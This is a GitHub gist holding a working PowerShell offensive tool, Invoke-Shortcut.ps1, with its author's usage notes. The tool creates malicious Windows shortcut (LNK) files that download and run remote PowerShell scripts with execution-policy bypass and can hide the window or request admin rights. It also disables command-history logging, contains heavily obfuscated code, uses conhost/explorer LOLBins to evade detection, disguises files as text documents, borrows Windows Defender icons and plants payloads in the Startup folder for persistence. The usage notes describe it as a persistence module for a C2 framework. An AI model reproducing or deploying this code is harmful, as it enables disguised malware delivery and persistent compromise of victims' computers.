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Last active February 18, 2024 05:58
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  • Save r00t-3xp10it/5bf1e26d42ddb75ac443b867e076d419 to your computer and use it in GitHub Desktop.
Save r00t-3xp10it/5bf1e26d42ddb75ac443b867e076d419 to your computer and use it in GitHub Desktop.
Create a shortcut file (.LNK) that runs appls\scripts if pressed [Mitre - T1027.012]
Create shortcut file (LNK) that runs appl\script [Mitre - T1027.012]
Author: @r00t-3xp10it
Tested Under: Windows 10 (19044) x64 bits
Required Dependencies: ComObject WScript.Shell
Optional Dependencies: Iwr, tinyurl
PS cmdlet Dev version: v2.3.12
Create one LNK file (shortcut) on selected location that
runs our program(.exe) or script(.ps1|.bat) when pressed
Or download\execute Script.ps1 from https://raw.github
The LNK file will inherit ApplicationToRun filename
If invoked -hidden switch shortcut will execute the
ApplicationToRun in an hidden terminal window state.
If invoked -RunItAsAdmin switch shortcut spawns [U]AC
to run elevated (runs with administrator privileges)
If invoked -remote 'url' switch then cmdlet downloads
and executes -uri 'https://raw.github/script.ps1' on
-StartIn 'dir' (function only accepts .PS1 scripts)
.Parameter ApplicationToRun
The path of appl\script to run (default: $Env:WINDIR\System32\cmd.exe)
.Parameter StartIn
The Application working directory (default: $Env:TMP)
.Parameter ApplArgs
The appl\script arguments to be executed? (default: false)
.Parameter LNKPath
The absolucte path where to create sortcut.lnk (default: $pwd)
.Parameter LNKdescription
The shortcut description field (default: Pc-Health)
.Parameter LNKIcon
The LNK file icon (default: $Env:WINDIR\system32\WSCollect.exe)
.Parameter Hidden
Switch that executes ApplicationToRun in an hidden terminal window
.Parameter RunItAsAdmin
Switch that makes shortcut ask for administrator privileges [U]AC
.Parameter Remote
Switch that downloads and executes -uri 'https://raw.github/script.ps1'
.Parameter Uri
The URL link to be downloaded\executed by the -remote switch
.Parameter Filter
Switch that allows users to chose LNK icon from pre-selected list
.Parameter LolBin
Switch that invokes conhost|explorer lolbins to exec script.PS1
and modifies the LNK file extension from cmd.LNK to cmd.TXT.LNK
Remark: Only available with -Applicationtorun "C:\Path\script.ps1"
.Parameter NoBanner
Switch that hiddes this cmdlet ANCII banner
PS> .\Invoke-Shortcut.ps1 -ApplicationToRun "$Env:TMP\Shell.exe" -LNKPath "C:\Users\pedro\OneDrive\Ambiente de Trabalho"
Create LNK file (shortcut) on desktop (Ambiente de Trabalho) that runs shell.exe if pressed
PS> .\Invoke-Shortcut.ps1 -ApplicationToRun "$Env:TMP\auxiliary.ps1" -ApplArgs "-action 'query'" -StartIn "$Env:TMP"
Create LNK file (shortcut) on $pwd directory that runs auxiliary.ps1 (%TMP% working dir) with arguments if pressed
PS> .\Invoke-Shortcut.ps1 -LNKIcon "C:\Windows\system32\CustomInstallExec.exe" -hidden -RunItAsAdmin
Create LNK file on $pwd dir, borrow icon from CustomInstallExec.exe, run in an hidden console, with admin privs
PS> .\Invoke-Shortcut.ps1 -REMOTE -Uri ""
Create LNK file on $pwd directory that downloads\executes Get-AVStatus.ps1 from -StartIn 'directory'
[19:18] Mitre - T1027.012
- Application privs : 'UserLand'
- ApplicationToRun : 'C:\WINDOWS\System32\cmd.exe'
- Shortcut WindowStyle : 'normal'
- Shortcut FileName : 'cmd.lnk'
- Shortcut LNK SHA : 'F8013FF7B6363593B3F495580354F4BE3D488B315195588DAB8A4F98D3096F1F'
- Shortcut Location : 'C:\Users\pedro\OneDrive\Ambiente de Trabalho\work\cmd.lnk'
- Shortcut Icon File : 'C:\Program Files (x86)\ASUS\ASUS Smart Gesture\DesktopManager\resource\WindowStoreApp.ico'
## CmdLet Global variable declarations!
[CmdletBinding(PositionalBinding=$false)] param(
[string]$LNKIcon="${Env:PROGRAMFILES(x86)}\ASUS\ASUS Smart Gesture\DesktopManager\resource\WindowStoreApp.ico",
$CmdletVersion = "v2.3.12"
$global:LNKIcon = $LNKIcon
## Local variable declarations
$CurrentTime = (Get-Date -Format 'HH:mm')
$ErrorActionPreference = "SilentlyContinue"
## Disable Powershell Command Logging for current session.
Set-PSReadlineOption –HistorySaveStyle SaveNothing|Out-Null
$host.UI.RawUI.WindowTitle = "Invoke-Shortcut $CmdletVersion"
$StartBanner = @"
____ _ _ ____ _____ _____ ____ __ __ _____
(_ (_ | |_| |/ () \| () )|_ _|/ (__ | | ||_ _|
__)__)|_| |_|\____/|_|\_\ |_| \____) \___/ |_|$CmdletVersion
write-host $StartBanner -ForegroundColor DarkBlue
write-host " GitHub:" -ForegroundColor DarkYellow
## Banner
write-host "`n [" -ForeGroundColor DarkGray -NoNewline
write-host "$CurrentTime" -ForeGroundColor DarkYellow -NoNewline
write-host "] Mitre - T1027.012" -ForeGroundColor DarkGray
If($LNKPath -match '^(:startmeup:)$')
## Meterpeter C2 v2.10.14.1 function
$LNKPath = "$Env:APPDATA\M@ic£ro'@'so£ft\£Wi@n£d@o£w£s\S@t£ar£t '@M£e@n£u'\P£r@og£ra@m£s\S@t'£ar£t@u£p" -replace '(@|£|'')',''
## Split path to extract last string (filename)
$RawTargetName = $ApplicationToRun.Split('\')[-1] -replace '(.exe|.ps1|.bat)$','' # cmd
$FinalName = "$LNKPath"+"\${RawTargetName}.lnk" -Join '' # C:\Users\pedro\AppData\Roaming\Microsoft\Windows\...\...\...\cmd.lnk
## Make sure LNK to create does not exist already
If(Test-Path -Path "$FinalName")
write-host " [" -NoNewline
write-host "ABORT" -ForegroundColor Red -NoNewline
write-host "] LNK already exists in '" -NoNewline
write-host "$FinalName" -ForegroundColor Red -NoNewline
write-host "'`n"
## Make sure working directory exists
If(-not(Test-Path -Path "$StartIn"))
write-host " [" -NoNewline
write-host "NOTFOUND" -ForegroundColor Red -NoNewline
write-host "] '" -NoNewline
write-host "$StartIn" -ForegroundColor Red -NoNewline
write-host "'`n"
function Invoke-BorrowIconFromExe ()
Author: r00t-3xp10it
Helper - Borrow icons from applications.exe
This function kicks in if inputed -LNKIcon 'path' param
can't find the icon file OR if user invoke -filter param
## Pre-Selected icons
$SearchIconsList = @(
"$Env:PROGRAMFILES\Windows Defender\MpCmdRun.exe",
"$Env:PROGRAMFILES\Windows Defender\Offline\OfflineScannerShell.exe",
"$Env:PROGRAMFILES\Microsoft Office 15\ClientX64\IntegratedOffice.exe",
"$Env:PROGRAMFILES\Microsoft Office\root\Office16\excelcnv.exe",
"$Env:PROGRAMFILES\Microsoft Office\root\Office16\OUTLOOK.exe",
"$Env:LOCALAPPDATA\Programs\Opera GX\opera.exe",
"$Env:PROGRAMFILES\Mozilla Firefox\Firefox.exe",
## Searching for icons!
ForEach($Item in $SearchIconsList)
If(Test-Path -Path "$Item")
## Icon found
write-host " * " -ForegroundColor Green -NoNewline
write-host "found: " -NoNewline
## Let user manually chose icon
write-host "$Item" -ForegroundColor Green
## Grab the first found application path
write-host "$Item`n" -ForegroundColor Green
Start-Sleep -Seconds 2
## Borrow icon from application
$global:LNKIcon = "$Item"
If($Item -match '(explorer.exe)$')
write-host " x Last icon of list reached " -ForegroundColor Red -NoNewline
write-host "'explorer.exe'`n"
Start-Sleep -Seconds 2
write-host " + " -NoNewline -ForegroundColor Red
write-host "Borrow icon from " -NoNewline
write-host "$Item" -NoNewline -ForegroundColor Red
write-host " appl? (Y|N): " -NoNewline
## Manual chose icon
$ChoseMe = Read-Host
If($ChoseMe -imatch '(y|yes)'){echo "";break}
## break loop after the first found icon
## Append icon to LNK file
$Sh.IconLocation = "$global:LNKIcon, 0"
function Invoke-RunItAsAdmin ()
Author: davidmneedham
Helper - Run LNK shortcut with administrator privileges
## RunItAsAdmin
$bytes = [System.IO.File]::ReadAllBytes("$FinalName")
('*' | %{${!'(} = +$()} { ${'#} =${!'(}}{${ '} =++ ${!'(} }{${'}=++${!'(}} { ${@}= ++ ${!'(} } { ${/}=++${!'(}}{${'/@} = ++${!'(} } { ${ } =++ ${!'(} } { ${ (}= ++ ${!'(} }{${``} = ++ ${!'(} }{${* }=++ ${!'(} } {${-=)} = "[" + "$(@{} )"[ ${ (} ]+"$(@{ })"["${ '}" +"${* }" ]+ "$(@{} )"[ "${'}"+"${'#}"]+ "$? "[ ${ '}] + "]"} { ${!'(}= "".("$(@{} ) "["${ '}${/}"]+ "$(@{} )"[ "${ '}${ }"] + "$(@{ })"[${'#} ] + "$( @{})"[${/} ]+"$?"[${ '} ]+ "$( @{ } )"[${@} ] )} {${!'(} = "$(@{ }) "["${ '}${/}"]+ "$( @{} )"[ ${/} ]+ "${!'(}"[ "${'}${ (}" ] }) ;" ${-=)}${@}${ } +${-=)}${* }${``}+ ${-=)}${ '}${'}${ '} +${-=)}${ '}${ '}${ } +${-=)}${ '}${'#}${ '} + ${-=)}${ '}${ '}${'/@} + ${-=)}${* }${ '}+ ${-=)}${/}${``} + ${-=)}${ '}${'}${'#} +${-=)}${/}${* } + ${-=)}${'/@}${@}+ ${-=)}${* }${@} +${-=)}${@}${'}+${-=)}${ }${ '}+ ${-=)}${@}${'}+ ${-=)}${@}${ } +${-=)}${* }${``}+${-=)}${ '}${'}${ '}+${-=)}${ '}${ '}${ } + ${-=)}${ '}${'#}${ '} +${-=)}${ '}${ '}${'/@}+${-=)}${* }${ '}+ ${-=)}${/}${``} + ${-=)}${ '}${'}${'#}+${-=)}${/}${* }+ ${-=)}${'/@}${@}+ ${-=)}${* }${@} +${-=)}${@}${'} + ${-=)}${/}${'/@}+ ${-=)}${* }${``} +${-=)}${ '}${ '}${ '}+${-=)}${ '}${ '}${/}+${-=)}${@}${'}+${-=)}${/}${``}+ ${-=)}${ '}${'}${'#}+ ${-=)}${'/@}${'#} + ${-=)}${/}${``}| ${!'(} " | &${!'(}
( '( %' |% { ${* .}=+$( ) }{${ }=${* .}}{ ${]} =++ ${* .} }{ ${*} =( ${* .} =${* .} + ${]} ) } {${``)(} =( ${* .} =${* .}+${]})}{ ${ ~}= (${* .}= ${* .}+${]} )}{ ${]``}= (${* .}= ${* .}+${]} ) } { ${=%#}=(${* .} =${* .} + ${]})}{ ${%}= ( ${* .}=${* .} + ${]})}{ ${)[}= (${* .} = ${* .}+${]} ) }{${~!+} = ( ${* .} =${* .} + ${]} ) } {${( '}="[" + "$(@{ } ) "[${%}] +"$(@{})"["${]}${~!+}" ] +"$(@{ } ) "[ "${*}${ }"] +"$?"[ ${]}] +"]" }{ ${* .}="".("$( @{} ) "[ "${]}" +"${ ~}"] + "$(@{} )"[ "${]}"+"${=%#}"]+"$(@{ } ) "[ ${ } ] +"$( @{})"[${ ~} ]+ "$?"[ ${]}] +"$(@{ })"[ ${``)(} ])}{${* .} = "$( @{})"[ "${]}${ ~}" ]+"$(@{})"[${ ~}]+ "${* .}"[ "${*}${%}"] } ) ; " ${( '}${~!+}${]}+ ${( '}${)[}${``)(}+ ${( '}${]}${*}${]}+${( '}${]}${]}${]``} +${( '}${]}${]}${=%#} + ${( '}${]}${ }${]}+${( '}${]}${ }${~!+}+${( '}${ ~}${=%#}+${( '}${%}${``)(} + ${( '}${%}${~!+}+ ${( '}${ ~}${=%#}+${( '}${%}${ } + ${( '}${]}${ }${]``}+${( '}${]}${ }${)[} + ${( '}${]}${ }${]} +${( '}${~!+}${``)(}+ ${( '}${]``}${)[}+ ${( '}${]``}${)[} + ${( '}${)[}${%}+ ${( '}${]}${]}${ ~} + ${( '}${]}${ }${]``} +${( '}${]}${]}${=%#} + ${( '}${]}${ }${]} +${( '}${=%#}${]``} + ${( '}${]}${ }${)[}+${( '}${]}${ }${)[}+${( '}${=%#}${=%#}+${( '}${]}${*}${]}+${( '}${]}${]}${=%#} + ${( '}${]}${ }${]}+ ${( '}${]}${]}${]``} +${( '}${ ~}${ } + ${( '}${``)(}${ ~}+ ${( '}${``)(}${=%#} + ${( '}${%}${ }+${( '}${]}${ }${]``} + ${( '}${]}${]}${ }+${( '}${~!+}${%}+${( '}${]}${ }${)[} +${( '}${%}${)[} + ${( '}${~!+}${%} +${( '}${]}${ }${~!+}+${( '}${]}${ }${]}+${( '}${``)(}${ ~} +${( '}${ ~}${ ~} + ${( '}${``)(}${*} +${( '}${``)(}${=%#} + ${( '}${~!+}${)[}+${( '}${]}${*}${]}+${( '}${]}${]}${=%#} + ${( '}${]}${ }${]}+${( '}${]}${]}${]``}+${( '}${ ~}${]} | ${* .}" |.${* .}
Author: r00t-3xp10it
Helper - LNK uri download\execution build function [REMOTE]
[19:20] Mitre - T1027.012
- URI : ''
- Shortcut WindowStyle : 'normal'
- Shortcut Privileges : 'UserLand'
- Shortcut FileName : 'GetAVStatus.lnk'
- Shortcut Icon File : 'C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe'
- Shortcut Location : 'C:\Users\pedro\OneDrive\Ambiente de Trabalho\work\GetAVStatus.lnk'
## Extract script name from url link
$CmdLetLocalName = $URI.Split('/')[-1] # Get-AVStatus.ps1
$RawFileName = $CmdLetLocalName -replace '(.ps1|-)','' # GetAVStatus
$FinalName = "${LNKPath}\${RawFileName}.lnk" # $Env:TMP\GetAVStatus.lnk
## -LNKPath limitations checks
If(Test-Path -Path "$FinalName")
write-host " [" -NoNewline
write-host "ABORT" -ForegroundColor Red -NoNewline
write-host "] LNK already exists in '" -NoNewline
write-host "$FinalName" -ForegroundColor Red -NoNewline
write-host "'`n"
## -Uri Parameter input limitations checks
If(($URI -iNotMatch '(.ps1)$') -or ($URI -iNotMatch '(//raw.)'))
write-host " [" -NoNewline
write-host "ERROR" -ForegroundColor Red -NoNewline
write-host "] this function only accepts [" -NoNewline
write-host ".ps1" -ForegroundColor Red -NoNewline
write-host "] or [" -NoNewline
write-host "//raw.github" -ForegroundColor Red -NoNewline
write-host "] formats`n"
## banner
write-host " - " -ForegroundColor Green -NoNewline
write-host "URI : '" -NoNewline
write-host "$URI" -ForegroundColor Green -NoNewline
write-host "'`n"
## Invoke-TinyUrl function
# This function makes our URL smaller ..
# because LNK execution field has characters limmit
$TinyUrlApi = "h£t@tp://ti@nyu£rl.c@om/ap@i-cr£eat££p" -replace '(@|£)',''
$TinyUrlWeb = "@i£w'@'r£ (`"{0}?u@r'l£={1}`" -@f' `"$TinyUrlApi`", `"$URI`")" -replace '(@|£|'')',''
$Response = $TinyUrlWeb|&('SEX' -replace 'S','I')
## Set Uri to tinyurl
$URI = $Response.Content
## Start building shortcut file [create ComObject]
$WScriptShell = New-Object -ComObject WScript.Shell
$Sh = $WScriptShell.CreateShortcut("$FinalName")
## Shortcut WindowStyle
$Delay = "0"
$HiddenColor = "Red"
$Sh.WindowStyle = "7"
$ShortcutWindowStyle = "minimized"
$Delay = "3"
$Sh.WindowStyle = "1"
$HiddenColor = "Green"
$ShortcutWindowStyle = "normal"
$Sh.TargetPath = "$Env:WINDIR\system32\WindowsPowerShell\v1.0\powershell.exe"
If($ApplArgs -match 'false')
## Uri without args
$Sh.Arguments = "cd $StartIn;iwr -Uri $URI -OutFile $CmdLetLocalName;powershell -exec bypass -W 1 -file $CmdLetLocalName"
$Sh.Arguments = "cd $StartIn;iwr -Uri $URI -OutFile $CmdLetLocalName;powershell -exec bypass -file $CmdLetLocalName;start-sleep -S $Delay"
## Uri with arguments
$Sh.Arguments = "cd $StartIn;iwr -Uri $URI -OutFile $CmdLetLocalName;powershell -exec bypass -W 1 -file $CmdLetLocalName $ApplArgs"
$Sh.Arguments = "cd $StartIn;iwr -Uri $URI -OutFile $CmdLetLocalName;powershell -exec bypass -file $CmdLetLocalName $ApplArgs"
If($StartIn -match '\s')
## StartIn directory with empty spaces
$Sh.WorkingDirectory = "`"$StartIn`""
## StartIn dir without empty spaces
$Sh.WorkingDirectory = "$StartIn"
## LNK file description
$Sh.Description = "Remote URI download\execution"
## Append icon to LNK function
If(-not(Test-Path -Path "$global:LNKIcon"))
write-host " x " -foregroundcolor red -nonewline
write-host "error: " -nonewline
write-host "inputed icon file not found!" -foregroundcolor red
Start-Sleep -Seconds 2
## Search for icons
## Search for icons
## Append icon to LNK file
$Sh.IconLocation = "$global:LNKIcon, 0"
## Save LNK
## -RunItAsAdmin configs
## Run LNK AsAdmin
$StatColor = "Red"
$ApplPrivs = "Administrator"
$StatColor = "Green"
$ApplPrivs = "UserLand"
## Print OnScreen
Write-Host " - " -ForegroundColor Green -NoNewline
Write-Host "Shortcut WindowStyle : '" -NoNewline
Write-Host "$ShortcutWindowStyle" -ForegroundColor $HiddenColor -NoNewline
Write-Host "'"
Write-Host " - " -ForegroundColor Green -NoNewline
Write-Host "Shortcut Privileges : '" -NoNewline
Write-Host "$ApplPrivs" -ForegroundColor $StatColor -NoNewline
Write-Host "'"
Write-Host " - " -ForegroundColor Green -NoNewline
Write-Host "Shortcut FileName : '" -NoNewline
Write-Host "${RawFileName}.lnk" -ForegroundColor Green -NoNewline
Write-Host "'"
Write-Host " - " -ForegroundColor Green -NoNewline
Write-Host "Shortcut Icon File : '" -NoNewline
Write-Host "$global:LNKIcon" -ForegroundColor Green -NoNewline
Write-Host "'"
Write-Host " - " -ForegroundColor Green -NoNewline
Write-Host "Shortcut Location : '" -NoNewline
Write-Host "$FinalName" -ForegroundColor Green -NoNewline
Write-Host "'`n"
## exit cmdlet
Author: r00t-3xp10it
Helper - Create shortcut file (LNK) that runs appl\script [LOCAL]
[19:18] Mitre - T1027.012
- Application privs : 'UserLand'
- ApplicationToRun : 'C:\WINDOWS\System32\cmd.exe'
- Shortcut WindowStyle : 'normal'
- Shortcut FileName : 'cmd.lnk'
- Shortcut LNK SHA : 'F8013FF7B6363593B3F495580354F4BE3D488B315195588DAB8A4F98D3096F1F'
- Shortcut Location : 'C:\Users\pedro\OneDrive\Ambiente de Trabalho\work\cmd.lnk'
- Shortcut Icon File : 'C:\Program Files (x86)\ASUS\ASUS Smart Gesture\DesktopManager\resource\WindowStoreApp.ico'
If($ApplicationToRun -iNotMatch '(.exe|.ps1|.bat)$')
write-host " [" -NoNewline
write-host "ERROR" -ForegroundColor Red -NoNewline
write-host "] ApplicationToRun only accepts '" -NoNewline
write-host ".exe,.ps1,.bat" -ForegroundColor Red -NoNewline
write-host "' extensions.`n"
If(-not(Test-Path -Path "$ApplicationToRun"))
write-host " [" -NoNewline
write-host "NOTFOUND" -ForegroundColor Red -NoNewline
write-host "] '" -NoNewline
write-host "$ApplicationToRun" -ForegroundColor Red -NoNewline
write-host "'`n"
If(-not(Test-Path -Path "$LNKPath"))
write-host " [" -NoNewline
write-host "NOTFOUND" -ForegroundColor Red -NoNewline
write-host "] '" -NoNewline
write-host "$LNKPath" -ForegroundColor Red -NoNewline
write-host "'`n"
## Create ComObject
$WScriptShell = New-Object -ComObject WScript.Shell
$Sh = $WScriptShell.CreateShortcut("$FinalName")
## Execute based on target extension
If(($ApplicationToRun -iMatch '(.ps1)$') -or ($ApplicationToRun -iMatch '(powershell.exe)$'))
$Sh.TargetPath = "$Env:WINDIR\system32\WindowsPowerShell\v1.0\powershell.exe"
If($ApplicationToRun -iMatch '(powershell.exe)$')
If(-not($ApplArgs -ieq "False")) ## Powershell execution 'With' args
## HIdden windows execution
$Sh.Arguments = "-exec bypass -W 1 -C `"$ApplArgs`""
## Normal execution
$Sh.Arguments = "-exec bypass -C `"$ApplArgs`";Start-Sleep -s 3"
If($ApplArgs -ieq "False") ## .PS1 execution 'Without' Args
## HIdden windows execution
$Sh.Arguments = "-exec bypass -W 1 -file `"$ApplicationToRun`""
## Meterpeter C2 v2.10.14.1 function
# Invokes conhost|explorer lolbins to exec PS1
$Sh.TargetPath = "$Env:WINDIR\system32\cmd.exe"
$Sh.Arguments = "start conhost.exe /k start explorer.exe & powershell -exec bypass -W 1 -file `"$ApplicationToRun`""
## Normal execution
$Sh.Arguments = "-exec bypass -file `"$ApplicationToRun`""
## Meterpeter C2 v2.10.14.1 function
# Invokes conhost|explorer lolbins to exec PS1
$Sh.TargetPath = "$Env:WINDIR\system32\cmd.exe"
$Sh.Arguments = "start conhost.exe /k start explorer.exe & powershell -exec bypass -file `"$ApplicationToRun`""
Else ## .PS1 execution 'WITH' args
## HIdden windows execution
$Sh.Arguments = "-exec bypass -W 1 -file $ApplicationToRun $ApplArgs"
## Meterpeter C2 v2.10.14.1 function
# Invokes conhost|explorer lolbins to exec PS1
$Sh.TargetPath = "$Env:WINDIR\system32\cmd.exe"
$Sh.Arguments = "start conhost.exe /k start explorer.exe & powershell -exec bypass -W 1 -file $ApplicationToRun $ApplArgs"
## Normal execution
$Sh.Arguments = "-exec bypass -file $ApplicationToRun $ApplArgs"
## Meterpeter C2 v2.10.14.1 function
# Invokes conhost|explorer lolbins to exec PS1
$Sh.TargetPath = "$Env:WINDIR\system32\cmd.exe"
$Sh.Arguments = "start conhost.exe /k start explorer.exe & powershell -exec bypass -file $ApplicationToRun $ApplArgs"
ElseIf($ApplicationToRun -iMatch '(.bat|.exe)$')
$Sh.TargetPath = "cmd.exe"
If($ApplArgs -ieq "False") ## WITHOUT ARGS
## Hidden terminal windows execution
# This will create a separate process (without a window), and not block parent window
$Sh.Arguments = "start /b cmd /R `"$ApplicationToRun`""
## Normal execution
$Sh.Arguments = "/R `"$ApplicationToRun`""
## With Arguments
$CheckIos = $ApplicationToRun.Split('\')[-1] # cmd.exe
If($CheckIos -match '(cmd.exe)$')
$Sh.Arguments = "/R $ApplArgs"
## Hidden terminal windows execution
# This will create a separate process (without a window), and not block parent window
$Sh.Arguments = "start /b cmd /R $ApplArgs"
$Sh.Arguments = "/R `"$ApplicationToRun $ApplArgs`""
## Hidden terminal windows execution
# This will create a separate process (without a window), and not block parent window
$Sh.Arguments = "start /b cmd /R `"$ApplicationToRun $ApplArgs`""
$StyleHidden = "7"
$HiddenColor = "Red"
$ShortcutWindowStyle = "minimized"
$StyleHidden = "1"
$HiddenColor = "Green"
$ShortcutWindowStyle = "normal"
$Sh.WindowStyle = "$StyleHidden"
If($StartIn -match '\s')
$Sh.WorkingDirectory = "`"$StartIn`""
$Sh.WorkingDirectory = "$StartIn"
$Sh.Description = "$LNKdescription"
## Make sure icon exists!
If(-not(Test-Path -Path "$global:LNKIcon"))
write-host " x " -foregroundcolor red -nonewline
write-host "error: " -nonewline
write-host "inputed icon file not found!" -foregroundcolor red
Start-Sleep -Seconds 2
## Search for icons
## Search for icons
## Append icon to LNK file
$Sh.IconLocation = "$global:LNKIcon, 0"
Author: r00t-3xp10it
Helper - Spoof the file extension to .txt.lnk
Switch that invokes conhost|explorer lolbins to exec script.PS1
and modifies the LNK file extension from cmd.LNK to cmd.TXT.LNK
$Sh.IconLocation = "$Env:WINDIR\system32\notepad.exe, 0"
$Sh.Description = "Type: Text Document"
## Save Icon
## RunItAsAdmin
$StatColor = "Red"
$ApplPrivs = "Administrator"
$StatColor = "Green"
$ApplPrivs = "UserLand"
Start-Sleep -Milliseconds 300
## Check if LNK was successfuly created
If(-not(Test-Path -Path "$FinalName"))
write-host " x " -ForegroundColor Red -NoNewline
write-host "error: " -NoNewline
write-host "fail to create LNK shortcut file`n" -ForegroundColor Red
Author: r00t-3xp10it
Helper - Spoof the file extension to .txt.lnk
Switch that invokes conhost|explorer lolbins to exec script.PS1
and modifies the LNK file extension from cmd.LNK to cmd.TXT.LNK
$global:LNKIcon = "$Env:WINDIR\system32\notepad.exe"
$NewCharName = $FinalName -replace '.lnk','.txt.lnk'
Move-Item -Path "$FinalName" -Destination "$NewCharName" -Force
$FinalName = $NewCharName
$ExtenName = "${RawTargetName}.txt.lnk"
$ExtenName = "${RawTargetName}.lnk"
## Banner
$SHA1 = (Get-FileHash "$FinalName").Hash
Write-Host " - " -ForegroundColor Green -NoNewline
Write-Host "Application privs : '" -NoNewline
Write-Host "$ApplPrivs" -ForegroundColor $StatColor -NoNewline
Write-Host "'"
Write-Host " - " -ForegroundColor Green -NoNewline
Write-Host "ApplicationToRun : '" -NoNewline
Write-Host "$ApplicationToRun" -ForegroundColor Green -NoNewline
Write-Host "'"
If($ApplArgs -ne "False")
Write-Host " * " -ForegroundColor Red -NoNewline
Write-Host "Application Args : '" -NoNewline
Write-Host "$ApplArgs" -ForegroundColor Red -NoNewline
Write-Host "'"
Write-Host " * " -ForegroundColor Red -NoNewline
Write-Host "LOLBIN Execution : '" -NoNewline
Write-Host "cmd start conhost.exe /k start explorer.exe &" -ForegroundColor Red -NoNewline
Write-Host "'"
Write-Host " * " -ForegroundColor Red -NoNewline
Write-Host "SPOOF Extension : from '" -NoNewline
Write-Host "${RawTargetName}.lnk" -ForegroundColor Red -NoNewline
Write-Host "' -> '" -NoNewline
Write-Host "${RawTargetName}.txt.lnk" -ForegroundColor Red -NoNewline
Write-Host "'"
write-host ""
Start-Sleep -Seconds 1
Write-Host " - " -ForegroundColor Green -NoNewline
Write-Host "Shortcut WindowStyle : '" -NoNewline
Write-Host "$ShortcutWindowStyle" -ForegroundColor $HiddenColor -NoNewline
Write-Host "'"
Write-Host " - " -ForegroundColor Green -NoNewline
Write-Host "Shortcut FileName : '" -NoNewline
Write-Host "$ExtenName" -ForegroundColor Green -NoNewline
Write-Host "'"
Write-Host " - " -ForegroundColor Green -NoNewline
Write-Host "Shortcut LNK SHA : '" -NoNewline
Write-Host "$SHA1" -ForegroundColor DarkYellow -NoNewline
Write-Host "'"
Write-Host " - " -ForegroundColor Green -NoNewline
Write-Host "Shortcut Location : '" -NoNewline
Write-Host "$FinalName" -ForegroundColor Green -NoNewline
Write-Host "'"
Write-Host " - " -ForegroundColor Green -NoNewline
Write-Host "Shortcut Icon File : '" -NoNewline
Write-Host "$global:LNKIcon" -ForegroundColor Green -NoNewline
Write-Host "'`n"
Copy link

r00t-3xp10it commented Feb 15, 2024

   Create shortcut file (LNK) that runs appl\script [Mitre - T1027.012]

   Author: @r00t-3xp10it
   Tested Under: Windows 10 (19044) x64 bits
   Required Dependencies: ComObject WScript.Shell
   Optional Dependencies: Iwr, tinyurl
   PS cmdlet Dev version: v2.3.12

   Create one LNK file (shortcut) on selected location that
   runs our program(.exe) or script(.ps1|.bat) when pressed
   Or download\execute Script.ps1 from https://raw.github

   Meterpeter C2 invokes this cmdlet has one persistence technic
   to auto-execute meterpeter payload on every system startup.


Parameter Descrition Default value
ApplicationToRun The path of appl\script to run $Env:WINDIR\System32\cmd.exe
StartIn The Application working directory $Env:TMP
ApplArgs The appl\script arguments to be executed
LNKPath The absolucte path where to create sortcut.LNK $pwd
LNKdescription The shortcut description field Pc-Health
LNKIcon The LNK file icon to use $Env:WINDIR\system32\CustomInstallExec.exe
Hidden Switch that executes ApplicationToRun in an hidden windows
RunItAsAdmin Switch that makes shortcut ask for administrator privs [U]AC
Remote Switch that downloads and executes -uri
Uri The URL link to be downloaded\executed by the -remote switch [h]ttps://
Filter Select LNK icon from pre-selected list
NoBanner Switch that hidde this cmdlet ANCII banner
LOLBIN Invokes conhost|explorer lolbins to exec script.PS1 Remark: Only available with -Applicationtorun "C:\Path\script.ps1" parameter

Create shortcut in current directory that executes cmd.exe if pressed (demo)

.\Invoke-Shortcut.ps1 -LNKPath "$pwd" -StartIn "$Env:TMP"


Create shortcut that executes cmd.exe (RunAsAdmin) with defrag.ico
-LNKIcon switch allow us to borrow applications.exe icon or to select icon.ico format

.\Invoke-Shortcut.ps1 -LNKIcon "$Env:WINDIR\system32\defrag.exe" -RunItAsAdmin

Create shortcut that executes powershell.exe with arguments and manual select LNK icon

.\Invoke-Shortcut.ps1 -ApplicationToRun "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ApplArgs "echo 'hello shanty';start-sleep -S 2;netstat -ano;start-sleep -S 3" -Filter


.\Invoke-Shortcut.ps1 -LNKIcon "$Env:WINDIR\system32\UNP\UNPUXLauncher.exe" -ApplArgs "netstat -ano|findstr `"ESTABLISHED`" && title hello shanty && pause"

Create shortcut that executes chkdsk.exe with arguments and administrator privileges

.\Invoke-Shortcut.ps1 -ApplicationToRun "$Env:WINDIR\system32\chkdsk.exe" -ApplArgs "/I /scan" -LNKIcon "$Env:PROGRAMFILES\PCHealthCheck\PCHealthCheckBroker.exe" -RunItAsAdmin

Create shortcut in current directory that executes script.ps1 (Admin) in an hidden console

.\Invoke-Shortcut.ps1 -ApplicationToRun "$pwd\script.ps1" -LNKIcon "$Env:WINDIR\system32\defrag.exe" -Hidden -RunItAsAdmin

Create shortcut in current directory that download\executes https://raw.github/script.ps1

.\Invoke-Shortcut.ps1 -REMOTE -Uri "" -LNKIcon "C:\WINDOWS\system32\wsl.exe" -RunItAsAdmin


Create shortcut in STARTUP directory that executes https://raw.github/Get-AVStatus.ps1
This function creates one LNK file in STARTUP directory with MpCmdRun.ico (Windows Defender Icon) that downloads \ executes Get-AVStatus.ps1 from %TMP% directory

.\Invoke-Shortcut.ps1 -REMOTE -Uri "" -LNKPath "$Env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" -LNKIcon "$Env:PROGRAMFILES\Windows Defender\MpCmdRun.exe" -StartIn "$Env:TMP"

Create shortcut in STARTUP directory that executes $Env:TMP\Payload.ps1
This function creates one LNK file in STARTUP directory with MpCmdRun.ico (Windows Defender Icon) that executes Payload.ps1 from %TMP% directory on every system startup

.\Invoke-Shortcut.ps1 -ApplicationToRun "$Env:TMP\Payload.ps1" -LNKPath "$Env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" -LNKIcon "$Env:PROGRAMFILES\Windows Defender\MpCmdRun.exe" -StartIn "$Env:TMP" -Hidden -RunItAsAdmin


Create shortcut in current directory that executes payload.ps1
(Window Hidden execution, Run-As.Administrator, LOLBINS execution to evade detection)

.\Invoke-Shortcut.ps1 -ApplicationToRun "$Env:TMP\Payload.ps1" -StartIn "$Env:TMP" -LOLBIN -Hidden -RunItAsAdmin

1 - LOLBIN function invokes conhost.exe | explorer.exe lolbins to exec Payload.PS1
2 - Modifies the LNK file extension from Payload.lnk to: Payload.txt.lnk
3 - Modifies the LNK file icon to: notepad.exe
4 - Modifies the LNK file description to: Type: Text Document


